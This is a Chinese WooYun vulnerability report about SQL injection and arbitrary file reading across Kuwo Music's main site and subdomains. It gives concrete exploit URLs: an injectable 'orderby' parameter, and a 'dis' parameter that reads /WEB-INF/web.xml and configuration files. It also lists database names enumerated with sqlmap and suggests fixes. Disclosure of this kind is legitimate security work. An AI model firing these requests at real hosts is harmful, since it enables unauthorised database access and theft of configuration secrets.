当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0221469

漏洞标题:酷我主站及十多个分站SQL注入+文件读取

相关厂商:酷我音乐

漏洞作者: pandas

提交时间:2016-06-21 16:06

修复时间:2016-06-27 09:39

公开时间:2016-06-27 09:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-21: 细节已通知厂商并且等待厂商处理中
2016-06-21: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

酷我主站及10+个分站SQL注入+文件读取,打个包。

详细说明:

漏洞站点统计:

http://yule.kuwo.cn/
http://kappa.kuwo.cn/
http://huodong.kuwo.cn/
http://album.kuwo.cn/
http://playlist.kuwo.cn/
http://play.kuwo.cn/
http://changba.kuwo.cn/
http://www.kuwo.cn/
http://tupian.kuwo.cn/
http://hbtv.kuwo.cn/
http://gxtv.kuwo.cn/
http://yinyue.kuwo.cn/


目前搜集到以上连主站共12个站点受影响,可能还有遗漏。
一.SQL注入:
http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1
漏洞参数:orderby
SQLMAP可跑数据:

QQ20160621-0@2x.png


涉及21个数据库:

available databases [21]:
[*] ACT
[*] BELL
[*] Cafe
[*] CONCERT
[*] CROWD_FUNDING
[*] information_schema
[*] KGE
[*] KGE_ACT
[*] KGECOMMENT
[*] KW_TV
[*] LISTEN_STORY
[*] MANYOU
[*] mysql
[*] NEWS
[*] performance_schema
[*] RESWIKI
[*] SPEAKER
[*] statistics
[*] TAOBAO
[*] test
[*] YAHOO


其余的站点都可以用sqlmap跑数据,漏洞点相同,附一张SQLMAP证明:

QQ20160621-1@2x.png


漏洞证明:

二、文件读取
这是一个历史问题,之前也有白帽子提交过,但厂商一直修复不好。
主站:
http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml?&pn=0&subid=142

QQ20160621-2@2x.png


http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/config.properties?&pn=0&subid=142

QQ20160621-3@2x.png


http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/log4j.properties?&pn=0&subid=142

QQ20160621-4@2x.png


同理:其他的分站点也存在该处文件读取漏洞,厂商还是抓紧修复下。

修复方案:

1. SQL注入:orderby参数严格过滤;
2. 文件读取:结合该功能点,判断是否跨越目录读取文件。或者用笨方法,判断好 ../ 、 WEB-INF 、 jsp$(jsp结尾)等文件不可读即可。

版权声明:转载请注明来源 pandas@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-27 09:39

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无